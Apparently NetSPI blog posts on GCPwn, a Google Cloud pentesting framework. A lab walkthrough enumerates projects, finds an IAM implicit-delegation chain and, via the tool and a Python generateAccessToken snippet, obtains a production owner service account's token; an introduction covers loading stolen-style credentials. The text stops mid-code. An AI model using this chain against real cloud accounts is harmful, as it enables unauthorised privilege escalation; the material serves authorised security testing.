  staging-project-1-426001 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> projects add production-project-1-426001 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> projects add testbench-426001 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> projects 

[*] Current projects known for all credentials:  

  my-private-test-project-430102 

  staging-project-1-426001 

  production-project-1-426001 

  testbench-426001 

With the new projects added, let's run enum_all on ALL known project IDs. Note this will include our original my-private-test-project-430102 project. To avoid this, you could run `projects rm <project_id>` or just pass "--project-ids" with the projects you want to run the module against. 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> modules run enum_all --iam 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

 

> Choose an option: 1 

[*]-------------------------------------------------------------------------------------------------------[*]

[***********] Beginning enumeration for my-private-test-project-430102 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Beginning Enumeration of RESOURCE MANAGER Resources... 

[*] Searching Organizations 

[*] Searching All Projects 

[*] Searching All Folders 

[-] No organizations, projects, or folders were identified. You might be restricted with regard to projects. If you know fo a project name add it manually via 'projects add <project_name> from the main menu 

[*] Getting remainting projects/folders via recursive folder/project list calls starting with org node if possible 

[*] NOTE: This might take a while depending on the size of the domain 

[SUMMARY] GCPwn found or retrieved NO Organization(s) 

[SUMMARY] GCPwn found or retrieved NO Folder(s) 

[SUMMARY] GCPwn found or retrieved NO Project(s) 

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking my-private-test-project-430102 for instances... 

[X] STATUS 403: Compute API does not appear to be enabled for project my-private-test-project-430102 

[SUMMARY] GCPwn found or retrieved NO Compute Instance(s) in my-private-test-project-430102 

[*] Checking Cloud Compute Project my-private-test-project-430102... 

[X] STATUS 403: Compute API does not appear to be enabled for project my-private-test-project-430102 

[SUMMARY] GCPwn found or retrieved NO Compute Project(s) with potential metadata shown below. 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking my-private-test-project-430102 for functions... 

[X] 403 The Cloud Functions API is not enabled for projects/my-private-test-project-430102/locations/- 

[SUMMARY] GCPwn found or retrieved NO Function(s) in my-private-test-project-430102 

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[X] 403: The user does not have storage.hmacKeys.list permissions on bucket 

[*] Checking my-private-test-project-430102 for HMAC keys... 

[SUMMARY] GCPwn found or retrieved NO HMAC Key(s) with corresponding service accounts (SAs) in my-private-test-project-430102 

[*] Checking my-private-test-project-430102 for buckets/blobs via LIST buckets... 

[X] The user does not have storage.buckets.list permissions on bucket 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking my-private-test-project-430102 for service accounts... 

[SUMMARY] GCPwn found or retrieved NO Service Account(s) in my-private-test-project-430102 

[*] Checking my-private-test-project-430102 for roles... 

[SUMMARY] GCPwn found or retrieved NO Custom Role(s) 

[***********] Ending enumeration for my-private-test-project-430102 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[***********] Beginning enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking staging-project-1-426001 for instances... 

[X] STATUS 403: Compute API does not appear to be enabled for project staging-project-1-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Instance(s) in staging-project-1-426001 

[*] Checking Cloud Compute Project staging-project-1-426001... 

[X] STATUS 403: Compute API does not appear to be enabled for project staging-project-1-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Project(s) with potential metadata shown below. 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking staging-project-1-426001 for functions... 

[**] Reviewing projects/staging-project-1-426001/locations/us-central1/functions/attacker-function 

[***] GET Individual Function 

[***] TEST Function Permissions 

[SUMMARY] GCPwn found 1 Function(s) in staging-project-1-426001 

   - [us-central1] attacker-function                                                                                                                                                            

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[*] Checking staging-project-1-426001 for HMAC keys... 

[SUMMARY] GCPwn found 1 HMAC Key(s) with corresponding service accounts (SAs) in staging-project-1-426001 

   - [staging-project-1-426001] GOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C25DJRDAV - ACTIVE                                                                                          

     SA: bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                       

[*] Checking staging-project-1-426001 for buckets/blobs via LIST buckets... 

[**] Reviewing gcf-sources-239052134916-us-central1 

[***] GET Bucket Object 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[***] GET Bucket Blobs 

[**] Reviewing old-development-bucket-9282734 

[***] GET Bucket Object 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[***] GET Bucket Blobs 

[**] Reviewing service-account-details-2323232 

[***] GET Bucket Object 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[***] GET Bucket Blobs 

[SUMMARY] GCPwn found 3 Buckets (with up to 10 blobs shown each) in staging-project-1-426001 

- gcf-sources-239052134916-us-central1 

  - DO_NOT_DELETE_THE_BUCKET.md 

  - attacker-function-aff7ccd2-6b13-4f6a-888f-471f15fd3a37/version-1/function-source.zip 

- old-development-bucket-9282734 

  - my_staging_service_key.json 

- service-account-details-2323232 

  - note.txt 

  - staging-project-1-426001-da65b2807066.json 

*See all blobs with 'data tables cloudstorage-bucketblobs --columns bucket_name,name [--csv filename]' 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[**] [staging-project-1-426001] Reviewing projects/239052134916/secrets/ServiceAccountHMACKeys-388372 

[***] GET Base Secret Entity 

[***] TEST Secret Permissions 

[***] LIST Secret Versions 

[****] GET Secret Version 4 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 4 

[****] GET Secret Version 3 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 3 

[****] GET Secret Version 2 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 2 

[****] GET Secret Version 1 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 1 

[SUMMARY] GCPwn found 1 Secret(s) in staging-project-1-426001 

- ServiceAccountHMACKeys-388372 

  - 1: <value_not_found> 

  - 2: <value_not_found> 

  - 3: <value_not_found> 

  - 4: <value_not_found> 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking staging-project-1-426001 for service accounts... 

[SUMMARY] GCPwn found 6 Service Account(s) in staging-project-1-426001 

   - 239052134916-compute@developer.gserviceaccount.com                                                                                                                                         

   - bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                           

   - deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                  

   - my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                    

   - staging-project-1-426001@appspot.gserviceaccount.com                                                                                                                                       

   - testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com                                                                                                            

[*] Checking staging-project-1-426001 for roles... 

[**] GET on role projects/staging-project-1-426001/roles/CustomRole... 

[SUMMARY] GCPwn found 1 Custom Role(s) 

   - ListBucketsOnly (projects/staging-project-1-426001/roles/CustomRole)                                                                                                                       

[***********] Ending enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[***********] Beginning enumeration for production-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking production-project-1-426001 for instances... 

[**] Reviewing instance-20240630-025631 

[***] GET Instance 

[***] TEST Instance Permissions 

[SUMMARY] GCPwn found 1 Compute Instance(s) in production-project-1-426001 

- zones/us-central1-c 

  - instance-20240630-025631 

[*] Checking Cloud Compute Project production-project-1-426001... 

[SUMMARY] GCPwn found 1 Compute Project(s) with potential metadata shown below. 

- production-project-1-426001 

  - KEY: KeyValue 

    VALUE: Use secret "serviceAccountKey"  

*Review any truncated data with 'data tables cloudcompute-projects --columns project_id,common_instance_metadata [--csv filename]' 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking production-project-1-426001 for functions... 

[**] Reviewing projects/production-project-1-426001/locations/us-central1/functions/function-12 

[***] GET Individual Function 

[***] TEST Function Permissions 

[SUMMARY] GCPwn found 1 Function(s) in production-project-1-426001 

   - [us-central1] function-12                                                                                                                                                                  

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[*] Checking production-project-1-426001 for HMAC keys... 

[SUMMARY] GCPwn found or retrieved NO HMAC Key(s) with corresponding service accounts (SAs) in production-project-1-426001 

[*] Checking production-project-1-426001 for buckets/blobs via LIST buckets... 

[**] Reviewing bucket-to-see-how-much-stuff-121212121212 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket bucket-to-see-how-much-stuff-121212121212 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[**] Reviewing gcf-v2-sources-506260596801-us-central1 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket gcf-v2-sources-506260596801-us-central1 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[**] Reviewing gcf-v2-uploads-506260596801-us-central1 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket gcf-v2-uploads-506260596801-us-central1 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[**] Reviewing testweoajrpjqfpweqjfpwejfwef 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket testweoajrpjqfpweqjfpwejfwef 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[SUMMARY] GCPwn found 4 Buckets (with up to 10 blobs shown each) in production-project-1-426001 

- bucket-to-see-how-much-stuff-121212121212 

- gcf-v2-sources-506260596801-us-central1 

- gcf-v2-uploads-506260596801-us-central1 

- testweoajrpjqfpweqjfpwejfwef 

*See all blobs with 'data tables cloudstorage-bucketblobs --columns bucket_name,name [--csv filename]' 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[**] [production-project-1-426001] Reviewing projects/506260596801/secrets/test 

[***] GET Base Secret Entity 

[***] TEST Secret Permissions 

[***] LIST Secret Versions 

[****] GET Secret Version 2 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 2 

[****] GET Secret Version 1 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 1 

[**] [production-project-1-426001] Reviewing projects/506260596801/secrets/test-location 

[***] GET Base Secret Entity 

[***] TEST Secret Permissions 

[***] LIST Secret Versions 

[****] GET Secret Version 1 

[****] TEST Secret Version Permissions 

[****] GETTING Secret Values For 1 

[SUMMARY] GCPwn found 2 Secret(s) in production-project-1-426001 

- test 

  - 1: <value_not_found> 

  - 2: <value_not_found> 

- test-location 

  - 1: <value_not_found> 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking production-project-1-426001 for service accounts... 

[SUMMARY] GCPwn found 1 Service Account(s) in production-project-1-426001 

   - productions-owner-role@production-project-1-426001.iam.gserviceaccount.com                                                                                                                 

[*] Checking production-project-1-426001 for roles... 

[SUMMARY] GCPwn found or retrieved NO Custom Role(s) 

[***********] Ending enumeration for production-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[***********] Beginning enumeration for testbench-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking testbench-426001 for instances... 

[X] STATUS 403: Compute API does not appear to be enabled for project testbench-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Instance(s) in testbench-426001 

[*] Checking Cloud Compute Project testbench-426001... 

[X] STATUS 403: Compute API does not appear to be enabled for project testbench-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Project(s) with potential metadata shown below. 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking testbench-426001 for functions... 

[X] 403 The Cloud Functions API is not enabled for projects/testbench-426001/locations/- 

[SUMMARY] GCPwn found or retrieved NO Function(s) in testbench-426001 

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[*] Checking testbench-426001 for HMAC keys... 

[SUMMARY] GCPwn found or retrieved NO HMAC Key(s) with corresponding service accounts (SAs) in testbench-426001 

[*] Checking testbench-426001 for buckets/blobs via LIST buckets... 

[SUMMARY] GCPwn found or retrieved NO Buckets (with up to 10 blobs shown each) in testbench-426001 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking testbench-426001 for service accounts... 

[SUMMARY] GCPwn found 1 Service Account(s) in testbench-426001 

   - role-just-for-testing@testbench-426001.iam.gserviceaccount.com                                                                                                                             

[*] Checking testbench-426001 for roles... 

[SUMMARY] GCPwn found or retrieved NO Custom Role(s) 

[*] Checking IAM Policy for Organizations... 

[*] Checking IAM Policy for Folders... 

[*] Checking IAM Policy for Projects... 

[*] Checking IAM Policy for Buckets... 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[*] Checking IAM Policy for CloudFunctions... 

[*] Checking IAM Policy for Compute Instances... 

[*] Checking IAM Policy for Service Accounts... 

[*] Checking IAM Policy for Secrets... 

[***********] Ending enumeration for testbench-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

Notice we found some interesting assets in the other projects, including a service account in each of them. Assuming we were able to pull the policy bindings at the end, we can run process_iam_bindings again to see if we get a nice role summary.

[*]-------------------------------------------------------------------------------------------------------[*]

 

[TRUNCATED] 

 

[******] Summary for serviceAccount:deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountUser 

 

[******] Summary for serviceAccount:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com [******] 

Secret Manager Summary 

  - "projects/239052134916/secrets/ServiceAccountHMACKeys-388372" (in staging-project-1-426001) 

    - roles/secretmanager.secretAccessor 

 

 

[******] Summary for serviceAccount:role-just-for-testing@testbench-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/production-project-1-426001/serviceAccounts/productions-owner-role@production-project-1-426001.iam.gserviceaccount.com" (in production-project-1-426001) 

    - roles/iam.serviceAccountTokenCreator 

 

[******] Summary for serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountKeyAdmin 

  - "projects/testbench-426001/serviceAccounts/role-just-for-testing@testbench-426001.iam.gserviceaccount.com" (in testbench-426001) 

    - roles/iam.serviceAccountTokenCreator 

 

[******] Summary for user:fwdcloudsec2233@gmail.com [******] 

Cloud Compute Summary 

  - "instance-20240630-025631" (in production-project-1-426001) 

    - roles/compute.admin 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountKeyAdmin 

Secret Manager Summary 

  - "projects/506260596801/secrets/test-location" (in production-project-1-426001) 

    - roles/secretmanager.admin 

[TRUNCATED] 

 

[*]-------------------------------------------------------------------------------------------------------[*]

Reviewing the data above, we see an interesting avenue of exploitation. Our current service account, testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com, in project staging-project-1-426001 has roles/iam.serviceAccountTokenCreator over service account role-just-for-testing@testbench-426001.iam.gserviceaccount.com in project testbench-426001, which means testbench-serviceaccount-multi has iam.serviceAccounts.implicitDelegation over role-just-for-testing. Furthermore, role-just-for-testing@testbench-426001.iam.gserviceaccount.com has roles/iam.serviceAccountTokenCreator over service account productions-owner-role@production-project-1-426001.iam.gserviceaccount.com in production-project-1-426001, which means role-just-for-testing has iam.serviceAccounts.getAccessToken over productions-owner-role. Thus, through implicit delegation, testbench-serviceaccount-multi can effectively exercise iam.serviceAccounts.getAccessToken against productions-owner-role (see the diagram above in the quick overview), and we should be able to simply request an access token for the production service account. 
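For context, the chain above ultimately resolves to the IAM Credentials API's generateAccessToken call with a delegates list. A minimal sketch is shown below; it is illustrative only and not necessarily how GCPwn's module is implemented.

from google.cloud import iam_credentials_v1 

TARGET = "productions-owner-role@production-project-1-426001.iam.gserviceaccount.com" 
DELEGATE = "role-just-for-testing@testbench-426001.iam.gserviceaccount.com" 

# Runs as testbench-serviceaccount-multi; the delegate hop supplies the getAccessToken edge to the target 
client = iam_credentials_v1.IAMCredentialsClient() 
response = client.generate_access_token( 
    name=f"projects/-/serviceAccounts/{TARGET}", 
    delegates=[f"projects/-/serviceAccounts/{DELEGATE}"], 
    scope=["https://www.googleapis.com/auth/cloud-platform"], 
) 
print(response.access_token, response.expire_time) 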

We could also see part of this by running the analyze_vulns module, which flags the first hop of the implicit delegation chain. 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> modules run analyze_vulns 

[*]-------------------------------------------------------------------------------------------------------[*]

[*****************] Anonymous and/or All Authenticated User Permissions  [*****************] 

[X] No Anonymous Permissions were identified 

[X] No Arbitrary Authenticated User Permissions were identified 

[*****************] IAM Analysis (Roles) [*****************] 

[*] Performing IAM Analysis on Workspace Thus Far... 

[TRUNCATED] 

[******] Vuln Summary for serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - 6:IAM_DIRECT:iam.serviceAccountKeys.create:IAM Service Accounts Service Keys Creator  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountKeyAdmin  

    - 14:IAM_DIRECT:*.*.setIamPolicy:SetIAMPolicy on Respective Resource  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountKeyAdmin  

Service Accounts Summary 

  - "projects/testbench-426001/serviceAccounts/role-just-for-testing@testbench-426001.iam.gserviceaccount.com" (in testbench-426001) 

    - 4:IAM_DIRECT:iam.serviceAccounts.getAccessToken:IAM Service Accounts Access Token Creator  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountTokenCreator  

    - 5:IAM_DIRECT:iam.serviceAccounts.implicitDelegation:IAM Implicit Delegation Allowed  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountTokenCreator  

    - 8:IAM_DIRECT:iam.serviceAccounts.signBlob:IAM Service Accounts Sign Blob  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountTokenCreator  

    - 9:IAM_DIRECT:iam.serviceAccounts.signJwt:IAM Service Accounts Sign JWT  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountTokenCreator  

    - 14:IAM_DIRECT:*.*.setIamPolicy:SetIAMPolicy on Respective Resource  

      - Impacted DIRECT Role(s): roles/iam.serviceAccountTokenCreator 

To exploit this, we will use the exploit module exploit_generate_access_token, which supports generating access tokens either via a direct link to a service account or through implicit delegation like we are about to attempt. Instead of having to supply all the service accounts in the implicit delegation chain (which you could do via module flags if you wanted), we will leverage the "--all-delegation" flag, which auto-detects implicit delegation routes in the data enumerated thus far and presents us with routes to choose from. The only catch is the caller needs to have implicit delegation rights on the starting node. In this case we know we have implicit delegation rights over role-just-for-testing, so we just choose option 2, and we're done. Note this will hopefully be a lot cleaner/refactored in the future, but it demonstrates the core functionality of auto-finding delegation routes. 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> modules run exploit_generate_access_token --all-delegation 

[*]-------------------------------------------------------------------------------------------------------[*]

> Choose a path from below to attempt implicit delegation. Note this will only work on fields that give access tokens, but those with impersonation are also shown for your benefit 

>> [1] serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

    (ACCESS TOKEN) -> [testbench-426001] - role-just-for-testing@testbench-426001.iam.gserviceaccount.com 

>> [2] serviceAccount:role-just-for-testing@testbench-426001.iam.gserviceaccount.com 

    (ACCESS TOKEN) -> [production-project-1-426001] - productions-owner-role@production-project-1-426001.iam.gserviceaccount.com 

>> [3] serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

    (IMPERSONATE) -> [testbench-426001] - role-just-for-testing@testbench-426001.iam.gserviceaccount.com 

    (ACCESS TOKEN) -> [production-project-1-426001] - productions-owner-role@production-project-1-426001.iam.gserviceaccount.com 

 

> Impersonation routes are provided below. Note these do not end in getting an access token but are still provided for your visiblity. 

>> serviceAccount:role-just-for-testing@testbench-426001.iam.gserviceaccount.com 

    (IMPERSONATE) -> [production-project-1-426001] - productions-owner-role@production-project-1-426001.iam.gserviceaccount.com 

>> serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

    (IMPERSONATE) -> [testbench-426001] - role-just-for-testing@testbench-426001.iam.gserviceaccount.com 

    (IMPERSONATE) -> [production-project-1-426001] - productions-owner-role@production-project-1-426001.iam.gserviceaccount.com 

> [4] Exit 

> Choose an option: 2 

[*] Successful API Call. Access Token will last until 2024-07-22 04:22:53+00:00: 

[*] Token: ya29.c.c0ASRK0GZ_v8[REDACTED] 

> Do you want to assume the new credentials? [y/n]y 

[*] Project ID of credentials is: staging-project-1-426001 

[*] Credentials successfully added 

Loading in OAuth2 token. Note it might be expired based on how long its existed... 

[*] Loaded credentials productions-owner-role@production-project-1-426001.iam.gserviceaccount.com_07212024_2322_UTC 

[*]-------------------------------------------------------------------------------------------------------[*]

(staging-project-1-426001:productions-owner-role@production-project-1-426001.iam.gserviceaccount.com_07212024_2322_UTC)> projects 

[*] Current projects known for all credentials:  

  my-private-test-project-430102 

  staging-project-1-426001 

  production-project-1-426001 

  testbench-426001 

(staging-project-1-426001:productions-owner-role@production-project-1-426001.iam.gserviceaccount.com_07212024_2322_UTC)> projects set production-project-1-426001 

(production-project-1-426001:productions-owner-role@production-project-1-426001.iam.gserviceaccount.com_07212024_2322_UTC)> creds info 

 

Summary for productions-owner-role@production-project-1-426001.iam.gserviceaccount.com_07212024_2322_UTC: 

Email: productions-owner-role@production-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - production-project-1-426001 

    - staging-project-1-426001 

    - testbench-426001 

 

Access Token: ya29.c.c0ASRK0GZ[REDACTED] 

And voilà, there it is: we are now the service account in the new project (note we have to run "projects set" after swapping credentials to change the default project). 

Final Notes / TL;DR 

This concludes the sample exploit scenario, which covered several enumeration, exploit, and process modules. A wiki article should be released in the near future explaining how you can add your own modules and submit pull requests. In the meantime, feel free to open issues or pull requests as you run into bugs while the tool continues to be refactored and improved. 

An Introduction to GCPwn – Part 1 https://www.netspi.com/blog/technical-blog/cloud-pentesting/introduction-to-gcpwn-part-1/ Mon, 29 Jul 2024 17:20:44 +0000 

GCPwn is a python-based framework for pentesting GCP environments. While individual exploit scripts exist today for GCP attack vectors, GCPwn seeks to consolidate all of these scripts and manage multiple sets of credentials at once (for example, multiple service account keys), all within one framework. With the use of interactive prompts, GCPwn makes enumeration and exploitation of resources/permissions easier to execute, aiding the average pentester. The tool also tries to use the newer GCP python SDK as opposed to the older libraries. The idea of a python framework, along with the overall presentation, builds upon the concepts of Rhino Security's Pacu tool, which is a python framework for testing AWS environments.

 GCPwn has the following high-level traits: 

  • Accepts/manages GCP credentials of different types  
  • Packages together enumeration/exploit scripts for different services for quick execution. 
  • Tracks permissions passively and allows one to brute force permissions through multiple testIamPermissions calls. 
  • Presents a framework for the research community to build upon using Google’s newest python SDKs.  

This blog is broken out into 3 parts as follows: 

  • Part 1: Cover the core concepts and high-level steps required to use the tool 
  • Parts 2 & 3 (will be released at a later date): Walk through example enumeration and exploitation scenarios using GCP in a test environment. Includes Cloud Storage HMAC keys, a Cloud Functions metadata endpoint exploit, and IAM implicit delegation.  

As a disclaimer, the tool is changing over time as I work on it. To see the most up-to-date information, check out the GCPwn wiki. The tool has also been presented at fwd:cloudsec 2024.

Step 0: Installation 

GCPwn can be installed either through a simple setup script or via Docker. Installation instructions for both methods are covered here. For the local installation, git clone the repository, run "setup.sh", and start GCPwn with "python3 main.py". For Docker, build the image using the Dockerfile and mount the desired folders at run time to save any data collected while running the tool.
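For reference, the local route roughly comes down to the commands below. The repository URL is an assumption on my part; defer to the wiki's installation page for the authoritative steps.

git clone https://github.com/NetSPI/gcpwn.git   # assumed repository location
cd gcpwn
./setup.sh
python3 main.py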

Step 1: Adding Credentials to Tool 

In most cases, you will need to add credentials to GCPwn to subsequently launch modules as that user or service account. GCPwn supports ADC credentials, standalone OAuth2 tokens, and service account JSON key files. GCPwn also supports a couple of unauthenticated modules at this point in time. More details for each method are given below: 

  1. Application Default Credentials (ADC): This terminology will probably change in the future as "ADC" really refers to the order in which GCP looks up credentials, but for now this flow is tied to email/password submissions for simplicity. This path usually involves running a series of "gcloud" (the GCP command line utility) commands. These will allow you to authenticate in a web browser with the username/password which in turn will generate a refresh token and OAuth2 tokens in the background.  While the OAuth2 tokens for ADC credentials usually expire, GCPwn will attempt to auto-refresh credentials via the refresh token when resuming the session. 

Example Credentials 

Email: <email>
Password: <password> 

Set up ADC Credentials Before Launching Tool 

gcloud auth login 
gcloud config set project <project_id> 
gcloud auth application-default login

Add ADC Credentials to GCPwn 

Input: adc leaked_adc_dev_creds 
[*] Project ID of credentials is: my-private-test-project-430102 
[*] Credentials successfully added 
[*] Loading in ADC credentials... 
[*] Attempting to refresh the credentials using the stored refresh token. Note this is normal for brand new OAuth2 credentials added/updated. 
[*] Credentials successfully refreshed... 
[*] Credentials successfully stored/updated... 
[*] Proceeding with up-to-date ADC credentials for leaked_adc_dev_creds... 
[*] Loaded credentials leaked_adc_dev_creds 
(my-private-test-project-430102:leaked_adc_dev_creds)>
  2. Standalone OAuth2 Token: This flow is for valid GCP OAuth2 tokens without corresponding refresh tokens. An example scenario might be getting a service account OAuth2 access token via the GCP metadata endpoint. You have the access token, but there is no corresponding refresh token like the "ADC" route. An OAuth2 token by itself will usually be valid for a set amount of time before expiring. Without a refresh token, GCPwn won't be able to auto-refresh the OAuth2 access token. However, you can update existing credentials with "creds update" if you swap out the expired OAuth2 token with a new valid OAuth2 token. You might also have to manually set the project ID via "projects set" as shown below. (A short sketch of how a bare token or JSON key maps onto an SDK credentials object follows after this list.)  

Example Credentials 

OAuth2 Token: ya29.a0AXooC[REDACTED]

Add OAuth2 Credentials to GCPwn 

Input: oauth2 webbinroot_oauth2_token ya29.a0AXooC[REDACTED] 
[*] Project ID of credentials is: Unknown 
[*] The project associated with these creds is unknown. To bind the creds to a project specify "creds <credname> set <projectname>". Otherwise you might have limited functionality with resources. 
[*] Loading in our OAuth2 credentials... 
(Unknown:webbinroot_oauth2_token)> projects set my-private-test-project-430102  
[X] my-private-test-project-430102  is not in the list of project_ids. Adding... 
(my-private-test-project-430102 :webbinroot_oauth2_token)> projects
  3. Service Account Keys: This flow is for valid GCP service account keys in the exported JSON format (you could also just build the JSON if you had all the corresponding info). These service account keys are pretty well known and static. At the moment, these don’t have any mechanisms in GCPwn for auto-refreshing as the expectation is their lifetime would not make it necessary. 

Example Credentials 

{ 
  "type": "service_account", 
  "project_id": "[Project_ID]", 
  "private_key_id": "[private_key_id]", 
  "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEv[TRUNCATED]\n-----END PRIVATE KEY-----\n", 
  "client_email": "[client_email]", 
  "client_id": "[client_id]", 
  "auth_uri": "https://accounts.google.com/o/oauth2/auth", 
  "token_uri": "https://oauth2.googleapis.com/token", 
  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs", 
  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/tes[TRUNCATED]", 
  "universe_domain": "googleapis.com" 
}

Add Service Account Credentials to GCPwn 

Input: service webbinroot_service_key /home/kali/Downloads/my_service_key.json  
Loading in our Service credentials... 
(my-private-test-project-430102 :webbinroot_service_key)>
  4. No Credentials: This flow is for when no credentials are needed. Entering nothing at the credential prompt drops the user into an unauthenticated session context. For example, GCPBucketBrute by Rhino Security was added as a cloud storage unauthenticated module and does not require credentials to run. 

Proceed With No Credentials in GCPwn 

Input:  
(None:None)>
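As context for the standalone OAuth2 and service account key flows above, the sketch below shows how each maps onto a python SDK credentials object. This is illustrative only (not GCPwn internals); the token value and file path are placeholders.

from google.cloud import storage 
from google.oauth2.credentials import Credentials 
from google.oauth2 import service_account 

# Standalone access token: no refresh token, so it simply expires after its lifetime 
token_creds = Credentials(token="ya29.a0AXooC[REDACTED]") 

# Exported JSON key file: static and long-lived 
key_creds = service_account.Credentials.from_service_account_file( 
    "/home/kali/Downloads/my_service_key.json" 
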